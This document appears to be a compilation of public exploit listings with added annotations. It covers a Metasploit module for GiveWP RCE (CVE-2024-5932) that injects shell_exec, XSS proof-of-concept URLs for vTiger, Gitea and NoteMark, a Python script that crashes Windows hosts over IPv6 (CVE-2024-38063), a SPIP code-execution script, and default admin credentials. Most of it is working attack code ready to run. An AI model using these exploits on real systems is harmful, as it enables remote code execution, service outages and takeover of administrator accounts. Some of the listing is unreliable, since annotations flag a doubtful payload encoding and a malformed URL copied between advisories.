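##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::Remote::HTTP::Wordpress
  prepend Msf::Exploit::Remote::AutoCheck

  # First GiveWP release that is not affected; check compares the readme version against it.
  FIXED_VERSION = '3.14.2'.freeze

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'GiveWP Unauthenticated Donation Process Exploit',
        'Description' => %q{
          The GiveWP Donation Plugin and Fundraising Platform plugin for WordPress in all versions up to and
          including 3.14.1 is vulnerable to a PHP Object Injection (POI) attack granting an unauthenticated
          arbitrary code execution.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'Villu Orav', # Initial Discovery
          'EQSTSeminar', # Proof of Concept
          'Julien Ahrens', # Vulnerability Analysis
          'Valentin Lobstein' # Metasploit Module
        ],
        'References' => [
          ['CVE', '2024-5932'],
          ['URL', 'https://github.com/EQSTSeminar/CVE-2024-5932'],
          ['URL', 'https://www.rcesecurity.com/2024/08/wordpress-givewp-pop-to-rce-cve-2024-5932'],
          ['URL', 'https://www.wordfence.com/blog/2024/08/4998-bounty-awarded-and-100000-wordpress-sites-protected-against-unauthenticated-remote-code-execution-vulnerability-patched-in-givewp-wordpress-plugin']
        ],
        'DisclosureDate' => '2024-08-25',
        'Platform' => %w[unix linux win],
        'Arch' => [ARCH_CMD],
        'Privileged' => false,
        'Targets' => [
          [
            'Unix/Linux Command Shell',
            {
              'Platform' => %w[unix linux],
              'Arch' => ARCH_CMD
              # tested with cmd/linux/http/x64/meterpreter/reverse_tcp
            }
          ],
          [
            'Windows Command Shell',
            {
              'Platform' => 'win',
              'Arch' => ARCH_CMD
              # tested with cmd/windows/http/x64/meterpreter/reverse_tcp
            }
          ]
        ],
        'DefaultTarget' => 0,
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'Reliability' => [REPEATABLE_SESSION],
          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
        }
      )
    )
  end

  # Version check against the plugin readme.
  #
  # Returns CheckCode::Unknown when WordPress cannot be confirmed, otherwise the
  # code reported by check_plugin_version_from_readme: Appears when the readme
  # version is below FIXED_VERSION, Safe at or above it. An unreadable readme
  # (Unknown/Detected) is passed through instead of being reported as Safe, as
  # the original did, because it proves nothing about the installed version;
  # AutoCheck still refuses to run on Safe.
  def check
    return CheckCode::Unknown unless wordpress_and_online?

    print_status("WordPress Version: #{wordpress_version}") if wordpress_version
    check_code = check_plugin_version_from_readme('give', FIXED_VERSION)
    return check_code unless check_code.code == 'appears'

    print_good("Detected GiveWP Plugin version: #{check_code.details[:version]}")
    CheckCode::Appears
  end

  # Pick one published donation form at random, fetch its nonce and submit the
  # poisoned donation. Every failure path aborts through fail_with.
  def exploit
    forms = fetch_form_list
    fail_with(Failure::UnexpectedReply, 'No forms found.') if forms.empty?

    selected_form = forms.sample
    valid_form = retrieve_and_analyze_form(selected_form['id'])
    fail_with(Failure::UnexpectedReply, 'Failed to retrieve a valid form for exploitation.') unless valid_form

    print_status("Using Form ID: #{valid_form['give_form_id']} for exploitation.")
    send_exploit_request(
      valid_form['give_form_id'],
      valid_form['give_form_hash'],
      valid_form['give_price_id'],
      valid_form['give_amount']
    )
  end

  # Enumerate donation forms through the unauthenticated give_form_search AJAX action.
  #
  # Returns the decoded JSON array of form objects (each is read for its 'id').
  # A missing response, a non-200 status, a non-JSON body or a non-array body
  # (admin-ajax.php answers "0" when the action is unknown, e.g. plugin inactive)
  # aborts the module; the original returned nil here, which then crashed
  # exploit with NoMethodError on forms.empty?.
  def fetch_form_list
    res = send_request_cgi(
      'method' => 'POST',
      'uri' => admin_ajax_uri,
      'data' => 'action=give_form_search'
    )
    fail_with(Failure::Unreachable, 'Failed to retrieve form list: no response.') unless res
    fail_with(Failure::UnexpectedReply, "Failed to retrieve form list: HTTP #{res.code}.") unless res.code == 200

    forms = parse_json(res.body)
    fail_with(Failure::UnexpectedReply, 'Failed to retrieve form list: body is not a JSON array.') unless forms.is_a?(Array)

    form_ids = forms.map { |form| form['id'] }.compact.sort
    print_good("Successfully retrieved form list. Available Form IDs: #{form_ids.join(', ')}")
    forms
  end

  # Request the per-form nonce for +form_id+ via the give_donation_form_nonce AJAX action.
  #
  # Returns a Hash with the four fields send_exploit_request needs, or nil when
  # the request fails, the body is not a JSON object, or it carries no nonce
  # under 'data'.
  def retrieve_and_analyze_form(form_id)
    form_res = send_request_cgi(
      'method' => 'POST',
      'uri' => admin_ajax_uri,
      'vars_post' => { 'action' => 'give_donation_form_nonce', 'give_form_id' => form_id }
    )
    return unless form_res&.code == 200

    form_data = parse_json(form_res.body)
    return unless form_data.is_a?(Hash)

    give_form_hash = form_data['data']
    return unless give_form_hash

    {
      'give_form_id' => form_id,
      'give_form_hash' => give_form_hash,
      # Somehow, can't randomize give_price_id and give_amount otherwise the exploit won't work.
      'give_price_id' => '0',
      'give_amount' => '$10.00'
    }
  end

  # Submit the donation whose give_title field carries the serialized gadget chain.
  #
  # The chain visible in the literal is Stripe\StripeObject -> GiveInsertPaymentData
  # -> Give -> Faker ValidGenerator (validator "shell_exec") -> SettingsRepository,
  # with the encoded payload stored as the address1 setting that the validator is
  # applied to. PHP's s:N: prefix is a byte count, so the length is taken with
  # bytesize rather than length (identical for ASCII payloads, correct otherwise).
  #
  # NOTE(review): the O:19/O:62/O:33/O:34 and s:10/s:12 prefixes only add up if a
  # single backslash and real NUL bytes reach unserialize(); the literal below, as
  # rendered in this listing, yields four backslashes per class separator on the
  # wire and literal "\0" text, so it relies on slash-stripping on the WordPress
  # side and the backslash count may have been doubled by rendering. Confirm the
  # escaping against the upstream module before relying on this listing.
  def send_exploit_request(give_form_id, give_form_hash, give_price_id, give_amount)
    encoded = payload.encoded
    final_payload = format(
      'O:19:"Stripe\\\\\\\\StripeObject":1:{s:10:"\\0*\\0_values";a:1:{s:3:"foo";' \
      'O:62:"Give\\\\\\\\PaymentGateways\\\\\\\\DataTransferObjects\\\\\\\\GiveInsertPaymentData":1:{' \
      's:8:"userInfo";a:1:{s:7:"address";O:4:"Give":1:{s:12:"\\0*\\0container";' \
      'O:33:"Give\\\\\\\\Vendors\\\\\\\\Faker\\\\\\\\ValidGenerator":3:{s:12:"\\0*\\0validator";' \
      's:10:"shell_exec";s:12:"\\0*\\0generator";' \
      'O:34:"Give\\\\\\\\Onboarding\\\\\\\\SettingsRepository":1:{' \
      's:11:"\\0*\\0settings";a:1:{s:8:"address1";s:%<length>d:"%<encoded>s";}}' \
      's:13:"\\0*\\0maxRetries";i:10;}}}}}}',
      length: encoded.bytesize,
      encoded: encoded
    )

    data = {
      'give-form-id' => give_form_id,
      'give-form-hash' => give_form_hash,
      'give-price-id' => give_price_id,
      'give-amount' => give_amount,
      'give_first' => Faker::Name.first_name,
      'give_last' => Faker::Name.last_name,
      'give_email' => Faker::Internet.email,
      'give_title' => final_payload,
      'give-gateway' => 'offline',
      'action' => 'give_process_donation'
    }

    # Timeout of 0: the module does not wait for a reply. Presumably because the
    # request only completes once shell_exec returns, which for a staged payload
    # is never -- confirm against the upstream module.
    send_request_cgi({
      'method' => 'POST',
      'uri' => admin_ajax_uri,
      'data' => URI.encode_www_form(data)
    }, 0)
  end

  private

  # admin-ajax.php below the configured TARGETURI; every request in this module goes there.
  def admin_ajax_uri
    normalize_uri(target_uri.path, 'wp-admin', 'admin-ajax.php')
  end

  # JSON.parse that returns nil instead of raising on a non-JSON (or empty) body.
  def parse_json(body)
    JSON.parse(body.to_s)
  rescue JSON::ParserError
    nil
  end
end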
[CVE-ID]:CVE-2024-44778
------------------------------------------
[Suggested description]:A reflected cross-site scripting (XSS) vulnerability in the "parent" parameter of the index page of vTiger CRM 7.4.0 allows attackers to execute arbitrary JavaScript in the context of a user's browser by luring the user to a crafted URL.
------------------------------------------
[Additional Information]
PoC (the payload shape, a value wrapped in %22 ... %22, suggests the parameter lands inside a double-quoted JavaScript string; the URL below points at a vendor-hosted demo instance, so reproduce only against an instance you are authorised to test):
https://demo7.vtexperts.com/vtigercrm7demo/index.php?module=Invoice&view=List&app=INVENTORY&parent=%22-alert()-%22
------------------------------------------
[Vulnerability Type]:Cross Site Scripting (XSS)
------------------------------------------
[Vendor of Product]:vTiger
------------------------------------------
[Affected Product Code Base]:vTiger CRM - 7.4.0.
------------------------------------------
[Affected Component]:The "parent" parameter of the vTiger CRM 7.4.0 index page
------------------------------------------
[Attack Type]:Remote
------------------------------------------
[CVE Impact Other]:Run arbitrary JavaScript code
------------------------------------------
[Attack Vectors]:Crafted URL
------------------------------------------
[Has vendor confirmed or acknowledged the vulnerability?]:true
------------------------------------------
[Discoverer]:Marco Nappi
------------------------------------------
[Reference]
http://vtiger.com
https://demo7.vtexperts.com/vtigercrm7demo/index.php?module=Invoice&view=List&app=INVENTORY&parent=%22-alert()-%22




[CVE-ID]:CVE-2024-44779
------------------------------------------
[Suggested description]
A reflected cross-site scripting (XSS) vulnerability in the "viewname" parameter of the index page of vTiger CRM 7.4.0 allows attackers to execute arbitrary JavaScript in the context of a user's browser by luring the user to a crafted URL.
------------------------------------------
[Additional Information]:
PoC (the payload shape, a single quote followed by an onpointerdown= attribute, suggests the parameter lands inside a single-quoted HTML attribute and the handler fires on a pointer event; the URL below points at a vendor-hosted demo instance, so reproduce only against an instance you are authorised to test):
https://demo7.vtexperts.com/vtigercrm7demo/index.php?module=Accounts&view=List&viewname=95ddd'+onpointerdown=alert()+alt=
------------------------------------------
[Vulnerability Type]
Cross Site Scripting (XSS)
------------------------------------------
[Vendor of Product]:vTiger
------------------------------------------
[Affected Product Code Base]:vTiger CRM - 7.4.0.
------------------------------------------
[Affected Component]:The "viewname" parameter of the vTiger CRM 7.4.0 index page.
------------------------------------------
[Attack Type]:Remote
------------------------------------------
[CVE Impact Other]:
Run arbitrary JavaScript code
------------------------------------------
[Attack Vectors]
Crafted URL
------------------------------------------
[Has vendor confirmed or acknowledged the vulnerability?]:true
------------------------------------------
[Discoverer]:Marco Nappi
------------------------------------------
[Reference]
http://vtiger.com
https://demo7.vtexperts.com/vtigercrm7demo/index.php?module=Accounts&view=List&viewname=95ddd (the payload portion of this reference is truncated in the original listing; see the PoC above for the full URL)



[CVE-ID]:CVE-2024-44777
------------------------------------------
[Suggested description]
A reflected cross-site scripting (XSS) vulnerability in the "tag" parameter of the index page of vTiger CRM 7.4.0 allows attackers to execute arbitrary JavaScript in the context of a user's browser by luring the user to a crafted URL.
------------------------------------------
[Additional Information]
PoC (the payload shape, a closing parenthesis and semicolon followed by a %22 ... alt=%22 attribute break-out, suggests the parameter lands inside a JavaScript call within a double-quoted attribute; the URL below points at a vendor-hosted demo instance, so reproduce only against an instance you are authorised to test):
https://demo7.vtexperts.com/vtigercrm7demo/index.php?module=Invoice&view=List&app=INVENTORY&tag=);alert();%22+alt=%22
------------------------------------------
[Vulnerability Type]:Cross Site Scripting (XSS)
------------------------------------------
[Vendor of Product]:vTiger
------------------------------------------
[Affected Product Code Base]:vTiger CRM - 7.4.0.
------------------------------------------
[Affected Component]
The "tag" parameter of the vTiger CRM 7.4.0 index page
------------------------------------------
[Attack Type]:Remote
------------------------------------------
[CVE Impact Other]
Run arbitrary JavaScript code
------------------------------------------
[Attack Vectors]:Crafted URL
------------------------------------------
[Has vendor confirmed or acknowledged the vulnerability?]:true
------------------------------------------
[Discoverer]:Marco Nappi
------------------------------------------
[Reference]
http://vtiger.com
https://demo7.vtexperts.com/vtigercrm7demo/index.php?module=Invoice&view=List&app=INVENTORY&tag=);alert();%22+alt=%22
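#!/usr/bin/env python3
# -*- coding: utf-8 -*-

# Exploit Title: Windows IPv6 CVE-2024-38063 Checker and Denial-Of-Service
# Date: 2024-08-07
# Exploit Author: Photubias
# Vendor Homepage: https://microsoft.com
# Vendor Advisory: [1] https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-38063
# Version: Windows 10, 11 <10.0.26100.1457 and Server 2016-2019-2022 <10.0.17763.6189
# Tested on: Windows 11 23H2 and Windows Server 2022
# CVE: CVE-2024-38063
#
# Usage: python3 <this script> <target link-local IPv6 address> [<target MAC address>]
#   The sender must sit on the same L2 segment as the target: raw Ethernet frames are sent.
#
# Caveats for operators:
#   * The "verification" step only shows that the target answers a Destination Options
#     header carrying an unknown option (type 0x81) with an ICMPv6 Parameter Problem.
#     RFC 8200 requires that reply for any unrecognised option whose two high bits are
#     10, patched or not, so a reply proves reachability and the absence of filtering,
#     NOT that the host is unpatched.
#   * The second phase is a denial of service: a successful run bluescreens the target.
#     Only run it against hosts you are authorised to crash.

import os, subprocess, re, time, sys

## Variables
sDstIP = 'fe80::78b7:6283:49ad:c565'  ## Placeholder, overridden by argv[1]
if len(sys.argv) > 1: sDstIP = sys.argv[1]  ## Please provide an argument
sDstMAC = '00:0C:29:55:E1:C8'  ## Placeholder, overridden by argv[2]; otherwise resolved via Neighbor Discovery below
if len(sys.argv) > 2: sDstMAC = sys.argv[2]
iBatches = 20
iCorruptions = 20  ## How many times do we want to corrupt the tcpip.sys memory per batch

try:
    print('--- Loading Scapy, might take some time ...')
    from scapy.config import conf
    conf.ipv6_enabled = False  ## presumably keeps scapy from doing its own IPv6 route/neighbour handling; frames are built by hand below
    import scapy.all as scapy
    scapy.conf.verb = 0
except Exception as e:  ## narrowed from a bare except so Ctrl+C / SystemExit still propagate
    print('Error while loading scapy, please run "pip install scapy" ({})'.format(e))
    sys.exit(1)

import logging
logging.getLogger('scapy.runtime').setLevel(logging.ERROR)

def selectInterface():  ## returns (npf device or ifname, ipv6, mac, windows devicename)
    def getAllInterfaces():  ## each entry: [adapter, ipv6, mac, windows devicename, windows guid]
        lstInterfaces = []
        if os.name == 'nt':
            proc = subprocess.Popen('getmac /NH /V /FO csv | FINDSTR /V /I disconnected', shell=True, stdout=subprocess.PIPE)
            for bInterface in proc.stdout.readlines():
                lstInt = bInterface.split(b',')
                sAdapter = lstInt[0].strip(b'"').decode()
                sDevicename = lstInt[1].strip(b'"').decode()
                sMAC = lstInt[2].strip(b'"').decode().lower().replace('-', ':')
                sWinguID = lstInt[3].strip().strip(b'"').decode()[-38:]
                ## sAdapter comes from the local getmac output, not from the network, but it is still
                ## interpolated into a shell command line, so keep the surrounding quotes.
                proc = subprocess.Popen('netsh int ipv6 show addr "{}" | FINDSTR /I Address'.format(sAdapter), shell=True, stdout=subprocess.PIPE)
                try: sIP = re.findall(r'[\w:]+:+[\w:]+', proc.stdout.readlines()[0].strip().decode())[0]
                except (IndexError, UnicodeDecodeError): sIP = ''  ## no IPv6 address line for this adapter
                if len(sMAC) == 17: lstInterfaces.append([sAdapter, sIP, sMAC, sDevicename, sWinguID])  # When no or bad MAC address (e.g. PPP adapter), do not add
        else:
            proc = subprocess.Popen('for i in $(ip address | grep -v "lo" | grep "default" | cut -d":" -f2 | cut -d" " -f2);do echo $i $(ip address show dev $i | grep "inet6 " | cut -d" " -f6 | cut -d"/" -f1) $(ip address show dev $i | grep "ether" | cut -d" " -f6);done', shell=True, stdout=subprocess.PIPE)
            for bInterface in proc.stdout.readlines():
                lstInt = bInterface.strip().split(b' ')
                try:
                    if len(lstInt[2]) == 17: lstInterfaces.append([lstInt[0].decode(), lstInt[1].decode(), lstInt[2].decode(), '', ''])
                except (IndexError, UnicodeDecodeError): pass  ## interface line without address/MAC columns
        return lstInterfaces

    lstInterfaces = getAllInterfaces()
    if not lstInterfaces:
        print('[-] No network interface with a usable MAC address found, cannot continue')
        sys.exit(1)
    iAnswer = 0  ## default: first adapter
    if len(lstInterfaces) > 1:
        for i, lstInt in enumerate(lstInterfaces, start=1):  # array of arrays: adapter, ip, mac, windows devicename, windows guID
            print('[{}] {} has {} ({})'.format(i, lstInt[2], lstInt[1], lstInt[0]))
        ## The published script had this prompt commented out and hard-coded sAnswer='3', a debugging
        ## leftover that silently picked the third adapter (or the first when fewer existed); the prompt
        ## is restored. Out-of-range input, including 0 (which used to select the *last* adapter via
        ## index -1), falls back to adapter 1.
        sAnswer = input('[?] Please select the adapter [1]: ').strip()
        if sAnswer.isdigit() and 1 <= int(sAnswer) <= len(lstInterfaces):
            iAnswer = int(sAnswer) - 1
    sNPF = lstInterfaces[iAnswer][0]
    sIP = lstInterfaces[iAnswer][1]
    sMAC = lstInterfaces[iAnswer][2]
    if os.name == 'nt': sNPF = r'\Device\NPF_' + lstInterfaces[iAnswer][4]
    return (sNPF, sIP, sMAC, lstInterfaces[iAnswer][3])

def get_packets(iID, sDstIPv6, sDstMac=None):
    ## Three frames per corruption attempt:
    ##  1. a Destination Options header with unknown option type 0x81 -> elicits an ICMPv6 Parameter
    ##     Problem from any conforming stack (this frame doubles as the reachability probe below)
    ##  2. first fragment (offset 0, more-fragments set) of fragment id 0xbedead00+iID carrying 'notalive'
    ##  3. an empty last fragment of the same id at offset 1
    ## hlim/fl only make each attempt's frames distinct; the fragment pair is the trigger this PoC uses.
    iFragID = 0xbedead00 + iID
    oPacket1 = scapy.IPv6(fl=1, hlim=64+iID, dst=sDstIPv6) / scapy.IPv6ExtHdrDestOpt(options=[scapy.PadN(otype=0x81, optdata='bad')])
    oPacket2 = scapy.IPv6(fl=1, hlim=64+iID, dst=sDstIPv6) / scapy.IPv6ExtHdrFragment(id=iFragID, m = 1, offset = 0) / 'notalive'
    oPacket3 = scapy.IPv6(fl=1, hlim=64+iID, dst=sDstIPv6) / scapy.IPv6ExtHdrFragment(id=iFragID, m = 0, offset = 1)
    if sDstMac:  ## Should always be this, it seems sending to 'ff:ff:ff:ff:ff:ff' does not work
        oPacket1 = scapy.Ether(dst=sDstMac) / oPacket1
        oPacket2 = scapy.Ether(dst=sDstMac) / oPacket2
        oPacket3 = scapy.Ether(dst=sDstMac) / oPacket3
    return [oPacket1, oPacket2, oPacket3]

def doIPv6ND(sDstIP, sInt):  ## Try to get a MAC address via IPv6 Neighbour Solicitation
    ## NOTE(review): the source link-layer option is sent as the broadcast MAC rather than the selected
    ## adapter's MAC (available from selectInterface()); kept as published, but worth confirming if
    ## targets fail to answer.
    sMACResp = None
    oNeighborSollicitation = scapy.IPv6(dst=sDstIP) / scapy.ICMPv6ND_NS(tgt=sDstIP) / scapy.ICMPv6NDOptSrcLLAddr(lladdr='ff:ff:ff:ff:ff:ff')
    oResponse = scapy.sr1(oNeighborSollicitation, timeout=5, iface=sInt)
    if oResponse and scapy.ICMPv6NDOptDstLLAddr in oResponse:
        sMACResp = oResponse[scapy.ICMPv6NDOptDstLLAddr].lladdr
    return sMACResp

lstInt = selectInterface()  ## NPF, IPv6, MAC, Name

sMAC = doIPv6ND(sDstIP, lstInt[0])
if sMAC:
    print(f'[+] Target {sDstIP} is reachable, got MAC Address {sMAC}')
    sDstMAC = sMAC
elif sDstMAC != '':
    print('[-] Target not responding to Neighbor Sollicitation Packets, using the provided MAC {}'.format(sDstMAC))
else:
    print('[-] Without a MAC address, this exploit will probably not work')

lstPacketsToSend = []
for _ in range(iBatches):
    for j in range(iCorruptions):
        ## each triplet is queued twice per batch on purpose (kept from the published PoC)
        lstPacketsToSend += get_packets(j, sDstIP, sDstMAC) + get_packets(j, sDstIP, sDstMAC)

## 'send' is Layer3 (let scapy figure out the MAC address), 'sendp' is L2 (MAC address is filled in, much better)
print('[i] Probing IPv6 reachability of {} with a malformed Destination Options header'.format(sDstIP))
## Probe first: a conforming stack answers option type 0x81 with "ICMPv6ParamProblem" (see caveats in the header)
oResp = scapy.srp1(lstPacketsToSend[0], iface=lstInt[0], timeout=5)
if oResp and scapy.IPv6 in oResp and scapy.ICMPv6ParamProblem in oResp:
    print('[+] {} answered with ICMPv6 Parameter Problem: reachable and unfiltered over IPv6 (this alone does not prove CVE-2024-38063 is unpatched)'.format(sDstIP))
else:
    input('[-] No Parameter Problem reply: target unreachable, IPv6 disabled or firewall is enabled. Please verify and rerun or press enter to continue')
print('[i] Waiting 10 seconds to let the target cool down (more is better)')
time.sleep(10)
input('[?] OK, continue to execute the Denial Of Service (BSOD)? Press Ctrl+C to cancel now')
########## Exploit
print('[+] Sending {} packets now via interface {} {}'.format(len(lstPacketsToSend), lstInt[0], lstInt[3]))
scapy.conf.verb = 1
scapy.sendp(lstPacketsToSend, iface=lstInt[0])
## The 60 s figure is the author's observation; it presumably matches the IPv6 reassembly timeout -- unverified here.
print('[+] All packets are sent, now it takes *exactly* 60 seconds for the target to crash')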
# Exploit Title: Stored XSS in Gitea
# Date: 27/08/2024
# Exploit Authors: Catalin Iovita & Alexandru Postolache
# Vendor Homepage: https://github.com/go-gitea/gitea
# Version: 1.22.0
# Tested on: Linux 5.15.0-107, Go 1.23.0
# CVE: CVE-2024-6886

## Vulnerability Description
Gitea 1.22.0 is vulnerable to stored cross-site scripting (XSS). An authenticated user who can edit a repository's settings can store an HTML anchor with a javascript: href in the repository description; the markup is rendered on the repository page and the script executes in the session of any other user who views the repository and clicks the link.

## Steps to Reproduce
1. Log in to the application.
2. Create a new repository, or open an existing repository's settings via the `$username/$repo_name/settings` endpoint.
3. In the Description field, input the following payload:

    <a href=javascript:alert()>XSS test</a>

4. Save the changes.
5. Open the repository page: the payload is rendered inside the description as a link rather than being escaped. Clicking it pops an alert box, showing that the injected script runs in the viewing user's browser.
<pre><code># Exploit Title: Stored XSS in NoteMark<br /># Date: 07/29/2024<br /># Exploit Author: Alessio Romano (sfoffo)<br /># Vendor Homepage: https://notemark.docs.enchantedcode.co.uk/<br /># Version: 0.13.0 and below<br /># Tested on: Linux<br /># References:<br />https://notes.sfoffo.com/contributions/2024-contributions/cve-2024-41819,<br />https://github.com/enchant97/note-mark/commit/a0997facb82f85bfb8c0d497606d89e7d150e182,<br />https://github.com/enchant97/note-mark/security/advisories/GHSA-rm48-9mqf-8jc3<br /># CVE: CVE-2024-41819<br /><br />## Steps to Reproduce<br />1. Log in to the application.<br />2. Create a new note or enter a previously created note.<br />3. Access the note editor functionality from the selected note by clicking<br />on the "Editor" tab.<br />4. Input the following payload:<br />[xss-link](javascript:alert(1))<br />5. Save the changes.<br />6. Click on the "Rendered" tab to view the rendered markdown version of the<br />note. Click on the previously created link to pop the injected alert.<br /><br />## HTTP Request PoC<br /><br />PUT /api/notes/<note-uuid>/content HTTP/1.1<br />Host: localhost:8000<br />Accept: */*<br />Content-Type: text/plain;charset=UTF-8<br />Content-Length: 34<br />Sec-Fetch-Site: same-origin<br />Authorization: Bearer <TOKEN><br /><br /><br />[xss-link](javascript:alert(1))<br /><br /></code></pre>
=============================================================================================================================================
| # Title : Online Graduate Tracer System V 1.0.0 IDOR Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits) |
| # Vendor : https://www.sourcecodester.com/sites/default/files/download/oretnom23/tracking.zip |
=============================================================================================================================================

poc :

[+] Dorking in Google or another search engine.

[+] Insecure Direct Object Reference (as reported; the behaviour described is an admin page reachable without authentication, i.e. broken access control): requesting the admin user-management page directly, without logging in, allows the creation of a new administrator account.

[+] use payload : /admin/user_ad.php or /admin/homead.php

[+] http://127.0.0.1/tracking/admin/user_ad.php

Greetings to :============================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |
==========================================================================
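=============================================================================================================================================
| # Title : SPIP 4.2.5 PHP Code execution Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 129.0.1 (64 bits) |
| # Vendor : https://www.spip.net/ |
=============================================================================================================================================

poc :

[+] Dorking in Google or another search engine.

[+] Pass the target's base URL as the first command-line argument (a placeholder is used when none is given). Only run this against an instance you are authorised to test.

[+] Save Payload as poc.php and run from cmd = C:\www\test>php poc.php http://target.example/spip/

[+] Payload :

<?php
/**
 * PoC for PHP code execution in SPIP 4.2.5 through the porte_plume_previsu action.
 *
 * A crafted markup snippet embedding PHP code is POSTed to spip.php as preview
 * data; see generatePayload() for the exact shape used.
 */
class IndoushkaExploit {
    private $targetUrl;
    private $payload;

    /**
     * @param string $targetUrl Base URL of the SPIP installation (spip.php is appended).
     * @param string $payload   PHP statements to embed in the preview markup.
     */
    public function __construct($targetUrl, $payload) {
        $this->targetUrl = rtrim($targetUrl, '/') . '/spip.php';
        $this->payload = $this->generatePayload($payload);
    }

    // Build the markup snippet that wraps the PHP code to execute. The random
    // number only makes the <img...> token unique between runs.
    private function generatePayload($payload) {
        return "[<img" . rand(10000000, 99999999) . ">->URL`<?php {$payload} ?>`]";
    }

    // Send the preview request and print whatever the server returns.
    public function exploit() {
        // POST body for the preview action
        $data = http_build_query(['action' => 'porte_plume_previsu', 'data' => $this->payload]);

        $ch = curl_init($this->targetUrl);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
        curl_setopt($ch, CURLOPT_POST, true);
        curl_setopt($ch, CURLOPT_POSTFIELDS, $data);

        // Browser-like headers, kept from the original PoC (described there as
        // helping to get past blocking).
        curl_setopt($ch, CURLOPT_HTTPHEADER, [
            'Content-Type: application/x-www-form-urlencoded',
            'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3'
        ]);

        $response = curl_exec($ch);

        if (curl_errno($ch)) {
            echo "cURL Error: " . curl_error($ch) . "\n";
        } else {
            // The status code helps tell a WAF/redirect answer from a real preview response.
            echo "Exploit Sent! Response (HTTP " . curl_getinfo($ch, CURLINFO_RESPONSE_CODE) . "):\n";
            echo $response;
        }

        curl_close($ch);
    }
}

// Usage: php poc.php <target base URL> [<php statements>]
// The published listing hard-coded a live third-party site here; a placeholder is
// used instead and the target must be supplied on the command line.
$targetUrl = $argv[1] ?? 'http://target.example/spip/'; // replace with the real address
$payload   = $argv[2] ?? 'system("pwd");';               // PHP statements to execute

$exploit = new IndoushkaExploit($targetUrl, $payload);
$exploit->exploit();


Greetings to :============================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |
==========================================================================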
=============================================================================================================================================
| # Title : Online Bus Ticketing v1.0 IDOR Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits) |
| # Vendor : https://download-media.code-projects.org/2020/04/Bus_Booking_IN_PHP_CSS_JavaScript_AND_MYSQL__FREE_DOWNLOAD.zip |
=============================================================================================================================================

poc :

[+] Dorking in Google or another search engine.

[+] Insecure Direct Object Reference (as reported; what is described is an administrator page reachable without authentication, i.e. broken access control): an unauthenticated visitor can open the control panel's "add admin" page with full permissions.

[+] use payload :/Administrator/add_admin.php

[+] http://127.0.0.1/BusBooking-master/Administrator/add_admin.php

Greetings to :============================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |
==========================================================================
====================================================================================================================================
| # Title : Online Appointment System v1.0 Insecure Settings Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits) |
| # Vendor : https://www.sourcecodester.com/php/14502/online-appointment-system-php-full-source-code-2020.html |
====================================================================================================================================

poc :

[+] Dorking in Google or another search engine.

[+] Insecure Settings : the application appears to leave a default administrative account in place after installation.

[+] use payload : user = admin & pass = admin123

[+] http://127.0.0.1/<install path>/admin/ (the original listing gives the malformed URL https://www/127.0.0.1/yorubanwitness000webhostappcom/admin/, which appears to contain a stray hosting path; log in at the admin path of your own install)


Greetings to :==================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |
================================================================
=============================================================================================================================================
| # Title : Multi-Vendor Online Groceries Management System v1.0 Insecure Settings Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits) |
| # Vendor : https://www.sourcecodester.com/php/15166/multi-vendor-online-groceries-management-system-phpoop-free-source-code.html |
=============================================================================================================================================

poc :

[+] Dorking in Google or another search engine.

[+] Insecure Settings : the application appears to leave a default administrative account in place after installation.

[+] use payload : user = admin & pass = admin123

[+] http://127.0.0.1/<install path>/admin/ (the original listing gives the malformed URL https://www/127.0.0.1/yorubanwitness000webhostappcom/admin/, identical to the one in the Online Appointment System advisory, so it is not specific to this product; confirm the admin path and the default credentials against this product's own install)


Greetings to :==================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |
================================================================